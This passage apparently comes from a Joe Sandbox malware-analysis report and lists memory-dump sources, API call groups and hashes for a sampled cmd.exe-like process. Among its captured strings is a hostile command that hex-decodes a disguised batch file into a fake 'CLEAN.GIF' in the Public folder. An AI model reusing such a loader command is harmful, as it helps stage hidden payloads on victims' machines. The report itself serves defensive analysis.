                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: CloseCodeExitHandleObjectProcessSingleWaitfflushfprintf
                                              • String ID:
                                              • API String ID: 1826527819-0
                                              • Opcode ID: f2fead82e6adea435ca3ec11aeaf7f247f0c9f685b678692693d010e6480eae1
                                              • Instruction ID: 2c1011e39b368b54b8a1e02b15760bc81a958420aa797c5f63b6289728ab88df
                                              • Opcode Fuzzy Hash: f2fead82e6adea435ca3ec11aeaf7f247f0c9f685b678692693d010e6480eae1
                                              • Instruction Fuzzy Hash: 0E012D72908682CAE6045B55E4543F9BFA1FF8E769F446134D54F863B6CF3EA0488B0A
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: ErrorMode$FullNamePathwcschr
                                              • String ID:
                                              • API String ID: 1464828906-0
                                              • Opcode ID: ae25a92083232286a245a47a38675b80b3e95939c3784da970b3955f028bd4da
                                              • Instruction ID: fbd2a206eaaf719d80f471f6709ac084bab68d0ec2737bd28430e12ca9d98d01
                                              • Opcode Fuzzy Hash: ae25a92083232286a245a47a38675b80b3e95939c3784da970b3955f028bd4da
                                              • Instruction Fuzzy Hash: AD310963A0865182E6619F15B4003FEB761FB4EBA8F588134DA5DC33F0DE7EE845470A
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: memset
                                              • String ID: onecore\base\cmd\maxpathawarestring.cpp
                                              • API String ID: 2221118986-3416068913
                                              • Opcode ID: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
                                              • Instruction ID: 7c607c505e1544947bbf3d15b1450d4d1e7e793b8e440734624eaafa3656d340
                                              • Opcode Fuzzy Hash: 6a4e720990391e2bb656b5b6d9cefd15da5558a473930315f543f8d448153d3d
                                              • Instruction Fuzzy Hash: 7A117322A0874281EB54CB55E1543F92390AF8DBF8F184231DD6D8B7F5EE2ED4808349
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: memsetwcschr
                                              • String ID: 2$COMSPEC
                                              • API String ID: 1764819092-1738800741
                                              • Opcode ID: b9ab5f7dc9e1de4fb73340b4936d8faa2c9ba4b21260c8514921b1ab44a1c5e6
                                              • Instruction ID: 2eca5134221dbfd6de1287d956ef0ede4780b2ac5ee2e77c0c46a4876acda717
                                              • Opcode Fuzzy Hash: b9ab5f7dc9e1de4fb73340b4936d8faa2c9ba4b21260c8514921b1ab44a1c5e6
                                              • Instruction Fuzzy Hash: 7A517123A0866285FB649B25D4613FA23919F4EBACF044031DA4DC73F5DFAEE544878B
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: wcschr$ErrorFileFindFirstLastwcsrchr
                                              • String ID:
                                              • API String ID: 4254246844-0
                                              • Opcode ID: 053ef0ea037464bca1c3e1451370ecd30b301868f2ab00a5e1309acbdd43457e
                                              • Instruction ID: af03ef898b14134bc329006e2ee32e4d55c6c8b57785a6c0249134ffdcca7f61
                                              • Opcode Fuzzy Hash: 053ef0ea037464bca1c3e1451370ecd30b301868f2ab00a5e1309acbdd43457e
                                              • Instruction Fuzzy Hash: CA418323A0C74286EE219B00E5543F9B7A0FF8DBA8F484531D94EC77A5DF3EE445864A
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: _get_osfhandle$ConsoleMode
                                              • String ID:
                                              • API String ID: 1591002910-0
                                              • Opcode ID: cc4878986f4e42514252d7eb877981450ae5bf52a0b27ba4d12556fbaf1eff51
                                              • Instruction ID: 52e85516d7e7b19469af8813d64f0e9a3dd2d8be7a46c06e0c4a29e14f5dedf7
                                              • Opcode Fuzzy Hash: cc4878986f4e42514252d7eb877981450ae5bf52a0b27ba4d12556fbaf1eff51
                                              • Instruction Fuzzy Hash: AEF07A36A59642CBE6148B10F9953F97BA0FB8D729F454135C90E83338DF3EB4158B06
                                              APIs
                                              Strings
                                              Similarity
                                              • API ID: DriveType
                                              • String ID: :
                                              • API String ID: 338552980-336475711
                                              • Opcode ID: 3bcdc316eb0a86f33f1a800567ff16fc16a0090fe1dc924e7a0720ee54c15b7d
                                              • Instruction ID: 3ba2c17f064935a308248ff5a329a261169b4fb7da43acfaa48617cc803b8a5b
                                              • Opcode Fuzzy Hash: 3bcdc316eb0a86f33f1a800567ff16fc16a0090fe1dc924e7a0720ee54c15b7d
                                              • Instruction Fuzzy Hash: 36E06D6762864086E7209B60E4511AAB7A0FB8D758F841525EA8D83734DF3CD249CF0D
                                              APIs
                                                • Part of subcall function 00007FF6EB17CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6EB17B9A1,?,?,?,?,00007FF6EB17D81A), ref: 00007FF6EB17CDA6
                                                • Part of subcall function 00007FF6EB17CD90: RtlAllocateHeap.NTDLL(?,?,?,00007FF6EB17B9A1,?,?,?,?,00007FF6EB17D81A), ref: 00007FF6EB17CDBD
                                              • GetConsoleTitleW.KERNELBASE ref: 00007FF6EB185B52
                                                • Part of subcall function 00007FF6EB184224: InitializeProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF6EB184297
                                                • Part of subcall function 00007FF6EB184224: UpdateProcThreadAttribute.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF6EB1842D7
                                                • Part of subcall function 00007FF6EB184224: memset.MSVCRT ref: 00007FF6EB1842FD
                                                • Part of subcall function 00007FF6EB184224: memset.MSVCRT ref: 00007FF6EB184368
                                                • Part of subcall function 00007FF6EB184224: GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF6EB184380
                                                • Part of subcall function 00007FF6EB184224: wcsrchr.MSVCRT ref: 00007FF6EB1843E6
                                                • Part of subcall function 00007FF6EB184224: lstrcmpW.KERNELBASE ref: 00007FF6EB184401
                                              • GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0 ref: 00007FF6EB185BC7
                                              Similarity
                                              • API ID: memset$AttributeConsoleHeapProcThreadTitlewcsrchr$AllocateInfoInitializeListProcessStartupUpdate_wcsnicmplstrcmpwcschr
                                              • String ID:
                                              • API String ID: 346765439-0
                                              • Opcode ID: 7ab6fa8dc0b51f14b91d73e5ffe10a57052e9477fd238aff7d214e1f01dcae97
                                              • Instruction ID: 535165e24c0ab43adbcea4281f78fc8b897341e21a0f76b907346d9ae0a85b8d
                                              • Opcode Fuzzy Hash: 7ab6fa8dc0b51f14b91d73e5ffe10a57052e9477fd238aff7d214e1f01dcae97
                                              • Instruction Fuzzy Hash: BB31B522A0C64286FA20A711A4903FD6395FF8DBE8F445031E94EC7BB5DF3EE501870A
                                              APIs
                                              • FindClose.KERNELBASE(?,?,?,00007FF6EB19EAC5,?,?,?,00007FF6EB19E925,?,?,?,?,00007FF6EB17B9B1), ref: 00007FF6EB183A56
                                              Similarity
                                              • API ID: CloseFind
                                              • String ID:
                                              • API String ID: 1863332320-0
                                              • Opcode ID: bab5306cd567feeb86bb0befbcdd41048a3801cd437bd301f39ca3c6803b8cd3
                                              • Instruction ID: bf39b40a4e348e1421e51bed70a2589422c11c5e813be88d4fc89ea7e93d03e3
                                              • Opcode Fuzzy Hash: bab5306cd567feeb86bb0befbcdd41048a3801cd437bd301f39ca3c6803b8cd3
                                              • Instruction Fuzzy Hash: DA01D622E08643D5E6548755B6503F566A1FF8CBA8B588030E50DC32B4DF2DF5828309
                                              APIs
                                              Similarity
                                              • API ID: Concurrency::cancel_current_taskmalloc
                                              • String ID:
                                              • API String ID: 1412018758-0
                                              • Opcode ID: 1cbc76b91adcbc50426ec0160b6c43d02b5c02c802198208a66957b4662997da
                                              • Instruction ID: 50b66114867919fc727482d5108bdc2b52a4a2479dbcef179588dd518c8f75d6
                                              • Opcode Fuzzy Hash: 1cbc76b91adcbc50426ec0160b6c43d02b5c02c802198208a66957b4662997da
                                              • Instruction Fuzzy Hash: E4E09213F1A70796FE152B6268413F812447F1C7A8F482430DD1DC93A2EE2EB195875A
                                              APIs
                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6EB17B9A1,?,?,?,?,00007FF6EB17D81A), ref: 00007FF6EB17CDA6
                                              • RtlAllocateHeap.NTDLL(?,?,?,00007FF6EB17B9A1,?,?,?,?,00007FF6EB17D81A), ref: 00007FF6EB17CDBD
                                              Similarity
                                              • API ID: Heap$AllocateProcess
                                              • String ID:
                                              • API String ID: 1357844191-0
                                              • Opcode ID: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
                                              • Instruction ID: 2a64165f4bdbdffcbaa8c868504c75ad082d581b270d40ca8e82853bc3a3922d
                                              • Opcode Fuzzy Hash: aa7e40b5d99d9a56d3058fd520baa9575a550189048c001a86f2540850faebe3
                                              • Instruction Fuzzy Hash: 37F03133A18642C6EB448B55F9902B8F7A1FB8DB54B589434D90E83364DF3DE485C705
                                              APIs
                                              Similarity
                                              • API ID: exit
                                              • String ID:
                                              • API String ID: 2483651598-0
                                              • Opcode ID: e255d2af7c18615348d8cf7a7b788cdf459202c7b5a34beac69f38e8db5c085f
                                              • Instruction ID: f1933bb0ff546ae3d5cdf54de63c1469da23ffe4a15a48afbd0bcb51a24259db
                                              • Opcode Fuzzy Hash: e255d2af7c18615348d8cf7a7b788cdf459202c7b5a34beac69f38e8db5c085f
                                              • Instruction Fuzzy Hash: 4BC0803270464687EB1C673135512BD55597F0D325F04543CC50BC12F1DF2DD4088609
                                              APIs
                                              • GetUserDefaultLangID.KERNELBASE(?,?,?,?,00007FF6EB176F97), ref: 00007FF6EB18550C
                                              Similarity
                                              • API ID: DefaultLangUser
                                              • String ID:
                                              • API String ID: 768647712-0
                                              • Opcode ID: 5d8fc4fa8e665926eb49570ec356dc21582dec5ebc006b351cd7b5a4e2c943bd
                                              • Instruction ID: 3fa9d2c147a3e2985a32abcfdb9587537ac3d7fc979011ad34423492a8e25a0c
                                              • Opcode Fuzzy Hash: 5d8fc4fa8e665926eb49570ec356dc21582dec5ebc006b351cd7b5a4e2c943bd
                                              • Instruction Fuzzy Hash: 52E012E3E082538AF5542A4164853F85953EB6F7B7FC44031C60D956E55D2F6841560E
                                              APIs
                                              Similarity
                                              • API ID: memset
                                              • String ID:
                                              • API String ID: 2221118986-0
                                              • Opcode ID: f77ccc38f2f42b08cf4ed255524ec50c837bf5ddba9254f495b6a2bfe7d154bb
                                              • Instruction ID: 1bc13282e995fa1d41f40da5b7b34278aaf352207f34ef7ac2cc64d36ada8f4d
                                              • Opcode Fuzzy Hash: f77ccc38f2f42b08cf4ed255524ec50c837bf5ddba9254f495b6a2bfe7d154bb
                                              • Instruction Fuzzy Hash: 4FF0E922B0978140EA508757B5402A95290AF8CBF4F088330EF7D87BE5DE3CD451C705
                                              APIs
                                              Strings
                                              Similarity
                                              • API ID: _get_osfhandlememset$wcschr
                                              • String ID: DPATH
                                              • API String ID: 3260997497-2010427443
                                              • Opcode ID: 61e475784263ec0578ee4568f0ecfacc12e0da9f92d71443f4b7f45241f80286
                                              • Instruction ID: 94c8c32f737233536db5eeb305ed038b14589eea5bb99206ab3239eba5ff7847
                                              • Opcode Fuzzy Hash: 61e475784263ec0578ee4568f0ecfacc12e0da9f92d71443f4b7f45241f80286
                                              • Instruction Fuzzy Hash: 8ED1AC23A0865282EA219B25D4503FE62A1FF4DBACF044235DA1D877F4DF3EE845874A
                                              APIs
                                              Strings
                                              Similarity
                                              • API ID: CloseValue$CreateDeleteOpen
                                              • String ID: %s=%s$\Shell\Open\Command
                                              • API String ID: 4081037667-3301834661
                                              • Opcode ID: 95367a666dc1e10ecfff189f591a6456c9e88ca4fe6cad7e4a3eb832a6d246c2
                                              • Instruction ID: b9794d8e301b8b657e17d8edcfd6b70009e6934b85876d0897bf7795bc02ab57
                                              • Opcode Fuzzy Hash: 95367a666dc1e10ecfff189f591a6456c9e88ca4fe6cad7e4a3eb832a6d246c2
                                              • Instruction Fuzzy Hash: E771D623B19B8282EB508B55E0503F9A2A1FF8DBA8F444131DE4E877E4DF3EE5498745
                                              APIs
                                              Strings
                                              Similarity
                                              • API ID: _wcsnicmpwcsrchr
                                              • String ID: COPYCMD
                                              • API String ID: 2429825313-3727491224
                                              • Opcode ID: 4d82711cc2208d1db92bdbc9a67415b50588ed216ffaf236914d612e0490fdc8
                                              • Instruction ID: e4d14422dbae43b58e2ff61188029cf241e5834e9c21ec7d040f014ca5932364
                                              • Opcode Fuzzy Hash: 4d82711cc2208d1db92bdbc9a67415b50588ed216ffaf236914d612e0490fdc8
                                              • Instruction Fuzzy Hash: A8F18223F0865286FB608F51D0443FD32A1AB0DBACF004239DE5DA36E8DE7EA555C74A
                                              APIs
                                              Similarity
                                              • API ID: ExclusiveLock$AcquireBufferCancelConsoleFileFlushInputReleaseSynchronous_get_osfhandlefflushfprintf
                                              • String ID:
                                              • API String ID: 3476366620-0
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: Heap$AllocateProcess
                                              • String ID:
                                              • API String ID: 1357844191-0
                                              APIs
                                              • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00000000,?,00007FF6EB17F52A,00000000,00000000,?,00000000,?,00007FF6EB17E626,?,?,00000000,00007FF6EB181F69), ref: 00007FF6EB17F8DE
                                              • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF6EB181F69,?,?,?,?,?,?,?,00007FF6EB17286E,00000000,00000000,00000000,00000000), ref: 00007FF6EB17F8FB
                                              • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF6EB181F69,?,?,?,?,?,?,?,00007FF6EB17286E,00000000,00000000,00000000,00000000), ref: 00007FF6EB17F951
                                              • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF6EB181F69,?,?,?,?,?,?,?,00007FF6EB17286E,00000000,00000000,00000000,00000000), ref: 00007FF6EB17F96B
                                              • wcschr.MSVCRT ref: 00007FF6EB17FA8E
                                              • _get_osfhandle.MSVCRT ref: 00007FF6EB17FB14
                                              • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,00007FF6EB181F69,?,?,?,?,?,?,?,00007FF6EB17286E,00000000,00000000,00000000,00000000), ref: 00007FF6EB17FB2D
                                              • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF6EB181F69,?,?,?,?,?,?,?,00007FF6EB17286E,00000000,00000000,00000000,00000000), ref: 00007FF6EB17FBEA
                                              • _get_osfhandle.MSVCRT ref: 00007FF6EB17F996
                                                • Part of subcall function 00007FF6EB180010: SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,0000237B,00000000,00000002,0000000A,00000001,00007FF6EB19849D,?,?,?,00007FF6EB19F0C7), ref: 00007FF6EB180045
                                                • Part of subcall function 00007FF6EB180010: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF6EB19F0C7,?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6EB19E964), ref: 00007FF6EB180071
                                                • Part of subcall function 00007FF6EB180010: ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6EB180092
                                                • Part of subcall function 00007FF6EB180010: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF6EB1800A7
                                                • Part of subcall function 00007FF6EB180010: MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF6EB180181
                                              • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF6EB181F69,?,?,?,?,?,?,?,00007FF6EB17286E,00000000,00000000,00000000,00000000), ref: 00007FF6EB18D401
                                              • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF6EB181F69,?,?,?,?,?,?,?,00007FF6EB17286E,00000000,00000000,00000000,00000000), ref: 00007FF6EB18D41B
                                              • longjmp.MSVCRT(?,?,00000000,00007FF6EB181F69,?,?,?,?,?,?,?,00007FF6EB17286E,00000000,00000000,00000000,00000000), ref: 00007FF6EB18D435
                                              • longjmp.MSVCRT(?,?,00000000,00007FF6EB181F69,?,?,?,?,?,?,?,00007FF6EB17286E,00000000,00000000,00000000,00000000), ref: 00007FF6EB18D480
                                              Strings
                                              • C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Xirnkxhvuzwepe.cmd" "C:\\Users\\Public\\CLEAN.GIF" 3 , xrefs: 00007FF6EB17F90E
                                              • =,;, xrefs: 00007FF6EB17F8C8
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: CriticalSection$EnterFileLeave$LockPointerShared_get_osfhandlelongjmp$AcquireByteCharErrorLastMultiReadReleaseWidewcschr
                                              • String ID: =,;$C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Xirnkxhvuzwepe.cmd" "C:\\Users\\Public\\CLEAN.GIF" 3
                                              • API String ID: 3964947564-1196249360
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: iswdigitiswspacewcschr
                                              • String ID: ()|&=,;"$=,;$Ungetting: '%s'
                                              • API String ID: 1595556998-2755026540
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: Heap$Processwcschr$Alloc$Sizeiswspace
                                              • String ID: "$=,;
                                              • API String ID: 3545743878-4143597401
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: CurrentFormatMessageThread
                                              • String ID: $%hs!%p: $%hs(%d) tid(%x) %08X %ws$%hs(%u)\%hs!%p: $(caller: %p) $CallContext:[%hs] $Exception$FailFast$LogHr$Msg:[%ws] $ReturnHr$[%hs(%hs)]$[%hs]
                                              • API String ID: 2411632146-3173542853
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
